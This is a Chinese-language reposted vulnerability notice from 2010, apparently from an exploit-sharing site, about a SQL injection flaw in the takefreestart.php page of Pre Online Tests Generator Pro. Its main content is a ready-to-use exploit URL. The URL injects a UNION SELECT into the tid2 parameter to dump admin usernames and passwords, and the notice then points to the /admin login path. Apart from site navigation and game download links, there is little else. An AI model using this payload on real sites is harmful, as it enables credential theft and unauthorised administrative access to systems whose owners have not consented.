文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>Pre Online Tests Generator Pro SQL Injection

Pre Online Tests Generator Pro SQL Injection

时间:2010-11-14  来源:Cru3l.b0y

发布日期:2010-11.14
发布作者:Cru3l.b0y

影响版本:未知
官方地址:http://www.preproject.com

漏洞类型:SQL注入
漏洞描述:takefreestart.php页面参数未进行严格过滤直接带入进行SQL查询,导致注入漏洞。

 

[+] Exploit :

 

http://target/path/takefreestart.php?tid=242&tid2=-1+union+select+1,2,3,group_concat(user_name,0x3a,user_pass),5,6,7,8+from+admin--&nxtq=true&q_no=1

 

 

[+] Admin Page: /admin
 

 

标签分类: SQL注入

相关阅读 更多 +
排行榜 更多 +
瓢虫少女

瓢虫少女

飞行射击 下载
潜艇鱼雷

潜艇鱼雷

飞行射击 下载
网络掠夺者

网络掠夺者

飞行射击 下载